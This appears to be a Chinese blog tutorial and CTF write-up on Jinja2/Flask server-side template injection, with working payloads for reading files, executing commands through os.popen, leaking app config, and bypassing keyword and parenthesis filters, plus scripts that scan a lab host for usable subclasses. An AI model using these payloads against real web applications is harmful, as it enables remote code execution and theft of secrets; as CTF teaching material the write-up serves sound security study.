SSTI(模板注入) 解析 和 ctf 做法

article/2025/10/10 2:41:00

基础知识补充:

  • __class__ 返回类型所属的对象
  • __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
  • __base__ 返回该对象所继承的基类
  • // __base__和__mro__都是用来寻找基类的
  • __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
  • __init__ 类的初始化方法
  • __globals__ 对包含函数全局变量的字典的引用
  • __builtins__  导入内置函数,例如eval()等

一般ssti都是通过 类->基类->危险函数的使用来实现注入的

 [].__class__         获取[] 对应的类

 [].__class__.__base__           获取[]对应的类的基类

 [].__class__.base__.__subclasses__()     获取[]对应的类的基类的所有子类

 [].__class__.base__.__subclasses__()[30]('flag').read()  (假设<type file> file方法是第30,使用read()方法来读取flag文件)

 [].__class__.base__.__subclasses__()[50].__init__.__globals__['os'].system('ls')  (假设os类是第50个,初始化它并使用system函数来执行ls命令)

SSTI读取文件

python2中可以使用file类来读取文件

{{[].__class__.__base__.__subclasses__()[40]('flag').read()}}

 python3中没有file类了

可以使用<class '_frozen_importlib_external.FileLoader'>,<class ‘click.utils.LazyFile’>

<class ‘codecs.IncrementalEncoder’>来读取文件

python脚本import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"]}}"res = requests.get(url=url, headers=headers)if 'click.utils.LazyFile' in res.text:print(i)payload:{{[].__class__.__base__.__subclasses__()[257]('flag').read()}}

 SSTI执行命令

可以用来执行命令的类有很多,其基本原理就是遍历含有eval函数即os模块的子类,利用这些子类中的eval函数即os模块执行命令。

寻找内建函数 eval 执行命令

查询有内置函数eval的类

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"res = requests.get(url=url, headers=headers)if 'eval' in res.text:print(i)payload:{{[].__class__.__base__.__subclasses__()[58].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

 寻找 os 模块执行命令

Python的 os 模块中有system和popen这两个函数可用来执行命令。其中system()函数执行命令是没有回显的,我们可以使用system()函数配合curl外带数据;popen()函数执行命令有回显。所以比较常用的函数为popen()函数,而当popen()函数被过滤掉时,可以使用system()函数代替

寻找有os模块的类

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"res = requests.get(url=url, headers=headers)if 'os.py' in res.text:print(i)payload:{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

寻找 importlib 类执行命令 

Python 中存在 <class '_frozen_importlib.BuiltinImporter'> 类,目的就是提供 Python 中 import 语句的实现(以及 __import__ 函数)。我么可以直接利用该类中的load_module将os模块导入,从而使用 os 模块执行命令。

也可以搜索__import__函数来导入os模块

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"res = requests.get(url=url, headers=headers)if '__import__' in res.text:print(i)payload:{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}

寻找 linecache 函数执行命令

inecache 这个函数可用于读取任意一个文件的某一行,而这个函数中也引入了 os 模块,所以我们也可以利用这个 linecache 函数去执行命令。

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"res = requests.get(url=url, headers=headers)if 'linecache' in res.text:print(i)payload={{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache']['os'].popen('ls').read()}}

config_app 

其中包含应用程序的所有配置值.在大多数情况下,这包括敏感值,例如数据库连接字符串,第三方服务的凭证,SECRET_KEY等。
例如:
url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等
如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

CTF实例

 shrine(xctf)

 url和路由

 app.route()路由可以通过app.route()中的url来访问一个具体的python类或函数

例如:


from flask import Flaskapp = Flask(__name__)  # 创建一个flask实例@app.route('/')
def  index():return("这里是/页面")@app.route('/flag')
def  flag():return("这里是falg页面")if __name__ == '__main__':  # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例app.run()  # app.run(debug=True),即可开启debug模式这里写了两个页面url分别是/ 和 /falg

当然也可以动态的传参以及对参数的过滤

# -*- coding: UTF-8 -*-from flask import Flaskapp = Flask(__name__)  # 创建一个flask实例@app.route('/')
def a():return 1@app.route('/student/<student_id>/')
def student(student_id):return '学生{}号的信息'.format(student_id)@app.route('/students/<int:student_id>/')
def students(student_id):return '学生{}号的信息'.format(student_id)if __name__ == '__main__':  # 如果是已主程序的方式启动(不是以导入模块的方式),则运行flask实例app.run()  # app.run(debug=True),即可开启debug模式

 student 页面中可以随便传参

students页面则只能穿int型数据

 源代码


import flask
import osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')
def index():return open(__file__).read()@app.route('/shrine/<path:shrine>')
def shrine(shrine):def safe_jinja(s):s = s.replace('(', '').replace(')', '')blacklist = ['config', 'self']return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + sreturn flask.render_template_string(safe_jinja(shrine))if __name__ == '__main__':app.run(debug=True)
app.config['FLAG'] = os.environ.pop('FLAG')

从环境变量中删除FALG变量并返回值给config

 s = s.replace('(', '').replace(')', '')

将() 替换为空

 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

将config,self 替换为None

分析:

如果没有过滤config

可以使用{{config.FLAG}}

如果没有过滤self

可以使用{{self.__dict__}},里面有所有字典的键与值

如果没有过滤()

可以使用subclasses()

payload:

url_for.__globals__['current_app'].config.FLAG

(为什么这里的config没有被过滤,不清楚)

Web_python_template_injection

存在ssti注入

 写脚本查询包含有os模块的索引

import requests
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52'}
for i in range(500):url = "http://61.147.171.105:63900/{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__}}"res = requests.get(url=url, headers=headers)if 'os.py' in res.text:print(i)

构造payload: 

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

使用file类读取拿到flag

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

Confusion1

输入{{2*3}} 结果为6,存在ssti漏洞

 

flag位置给出

发现关键词 class base read 被过滤

  • 使用引号绕过

__class__  ->  ["__cla""ss__"]

构造payload

()["__cla""ss__"]["__ba""se__"]["__subclas""ses__"]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')["re""ad"]()

拿到flag 

  •  使用request绕过

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read


http://chatgpt.dhexx.cn/article/5i6XVPaL.shtml

相关文章

SSTI注入————php的SSTI

SSTI注入————php的SSTI

SSTI 就是服务器端模板注入&#xff08;Server-Side Template Injection&#xff09; ​ 当前使用的一些框架&#xff0c;比如python的flask&#xff0c;php的tp&#xff0c;java的spring等一般都采用成熟的的MVC的模式&#xff0c;用户的输入先进入Controller控制器&#xff0…
阅读更多...
SSTI

SSTI

模板注入在py2和py3中有些不同&#xff0c;但是没有本质上的区别。 模板注入的流程&#xff1a;找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。 几个魔术方法&#xff1a; class 返回类型所属的对象 mro 返回一个包含对象所继承的基类…
阅读更多...
SSTI模板注入及绕过姿势(基于Python-Jinja2)

SSTI模板注入及绕过姿势(基于Python-Jinja2)

前言&#xff1a;​SSTI&#xff08;服务端模板注入&#xff09;&#xff0c;已然不再是一个新话题&#xff0c;近年来的CTF中还是也经常能遇到的&#xff0c;比如护网杯的easy_tonado、TWCTF的Shrine&#xff0c;19年的SCTF也出了Ruby ERB SSTI的考点&#xff1b;本篇对这部分…
阅读更多...
SSTI (服务器模板注入)

SSTI (服务器模板注入)

先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app Flask(__name__) app.route("/") def index():name request.args.get(name, guest)t Template("Hello &…
阅读更多...
初步认识SSTI

初步认识SSTI

SSTI简介 SSTI&#xff0c;即服务端模板注入&#xff0c;起因是服务端接收了用户的输入&#xff0c;将其作为 Web 应用模板内容的一部分&#xff0c;在进行目标编译渲染的过程中&#xff0c;执行了用户插入的恶意内容&#xff0c;从而导致各种各样的问题。 Python SSTI(flask…
阅读更多...
ISCC SSTI

ISCC SSTI

先找参数吧&#xff0c;通过信息搜集&#xff0c;参数是xiaodouni 就是小豆泥的英文&#xff0c;这个是暹罗猫的一个名字吧 然后直接放两个payload的吧 看不懂的可以看一下我以前的文章CTFshow ssti里面讲了思路&#xff0c;这里就不再解释了。 {%set pp(dict(popa))|join%} …
阅读更多...
SSTI 学习笔记

SSTI 学习笔记

PHP SSTI(Twig) 学习文章 进入环境&#xff0c;左上角有flag,hint 都检查看看 flag页面显示ip&#xff0c;hint页面源代码有提示 考虑XFF头或者referer头 测试一下 注&#xff1a;这里不用加上“&#xff1b;” 出来了 python flask ssti 学习文章 原理&#xff1a;因为对输…
阅读更多...
浅学Go下的ssti

浅学Go下的ssti

前言 作为强类型的静态语言&#xff0c;golang的安全属性从编译过程就能够避免大多数安全问题&#xff0c;一般来说也唯有依赖库和开发者自己所编写的操作漏洞&#xff0c;才有可能形成漏洞利用点&#xff0c;在本文&#xff0c;主要学习探讨一下golang的一些ssti模板注入问题…
阅读更多...
SSTI——java里的ssti

SSTI——java里的ssti

1.Velocity 2.FreeMarker 因为从来没接触过java语言 所以对这些也是基本上一窍不通 这里只简单的提及 不做具体介绍 会找一下题来做 但是没有找到有关java ssti的题目 confusion1 看一下描述 打开题目 没发现什么东西 但是 login register页面显示访问不成功 查看源代码找到…
阅读更多...
详解SSTI模板注入

详解SSTI模板注入

详解SSTI模板注入 SSTI简介常见的模板引擎PHPJAVAPYTHONRUBYGOLANG SSTI产生的原因常用检测工具 TplmapFlask/Jinja模板引擎的相关绕过Flask简介demo漏洞代码基础知识沙盒逃逸Python的内建函数名称空间类继承 寻找Python-SSTI攻击载荷的过程攻击载荷过程常用的目标函数常见的中…
阅读更多...
web安全-SSTI模板注入漏洞

web安全-SSTI模板注入漏洞

一.初识SSTI 1.什么是SSTI注入&#xff1f; SSTI模板注入(Server-Side Template Injection)&#xff0c;通过与服务端模板的输入输出交互&#xff0c;在过滤不严格的情况下&#xff0c;构造恶意输入数据&#xff0c;从而达到读取文件或者getshell的目的。 2.SSTI漏洞成因 ​…
阅读更多...
BugKu:Simple_SSTI(SSTI模板注入)

BugKu:Simple_SSTI(SSTI模板注入)

目录 1.Simple_SSTI_1 2.Simple_SSTI_2 1.Simple_SSTI_1 点击链接进入&#xff0c;题目说&#xff1a; You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看&#xff0c;也可以右击页面--->“检查” 如图所示&#xff0c;我…
阅读更多...
SSTI模板注入绕过(进阶篇)

SSTI模板注入绕过(进阶篇)

文章目录 语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例&#xff0c;根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for State…
阅读更多...
学习ssti

学习ssti

ssti也叫做模板注入 当不正确的使用模板引擎进行渲染时&#xff0c;则会造成模板注入 比如render_template_string函数&#xff0c;当参数可控时&#xff0c;会造成模板注入 在Python的ssti中&#xff0c;大部分是依靠基类->子类->危险函数的方式来利用ssti python沙…
阅读更多...
Simple_SSTI_1与Simple_SSTI_2

Simple_SSTI_1与Simple_SSTI_2

目录 一&#xff0c;Simple_SSTI_1 二&#xff0c;Simple_SSTI_2 一&#xff0c;Simple_SSTI_1 首先打开场景&#xff1a; 然后F12查看一下源码&#xff1a; 于是通过百度相关知识寻找线索&#xff1a; 1&#xff0c;SSTI &#xff1a;服务器端模版注入是指攻击者能够使用本…
阅读更多...
Flask SSTI漏洞介绍及利用

Flask SSTI漏洞介绍及利用

1.ssti成因 flask使用jinjia2渲染引擎进行网页渲染&#xff0c;当处理不得当&#xff0c;未进行语句过滤&#xff0c;用户输入{{控制语句}}&#xff0c;会导致渲染出恶意代码&#xff0c;形成注入。 2.使用render_template()渲染页面时不存在注入漏洞。 对传入的参数不会执行…
阅读更多...
ssti小总结

ssti小总结

漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当&#xff0c;导致用户输入可以修改服务端模版的执行逻辑&#xff0c;从而造成XSS,任意文件读取&#xff0c;代码执行等一系列问题. 1. 几种常用于ssti的魔术方法 __class__ 返回类型所属的对象 __mro__ 返回一个…
阅读更多...
SSTI---总结

SSTI---总结

Laravel Blade是Laravel提供的一个既简单又强大的模板引擎 和其他流行的PHP模板引擎不一样&#xff0c;Blade并不限制你在视图view中使用原生的PHP代码 所有的Blade视图页面都将被编译成原生的PHP代码并缓存起来&#xff0c;除非你的的模板文件修改&#xff0c;否则不会重新编…
阅读更多...
SSTI入门详解

SSTI入门详解

文章目录 关于基于flask的SSTI漏洞的阶段学习小结&#xff1a;SSTI的理解&#xff1a;SSTI引发的真正原因&#xff1a;render_template渲染函数是什么&#xff1a;render_template&#xff1a;注入的思想&#xff1a;playload 娓娓道来&#xff1a;魔术对象&#xff1a;用魔术对…
阅读更多...
SSTI完全学习

SSTI完全学习

一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI…
阅读更多...
推荐文章

Copyright @ 2022~2023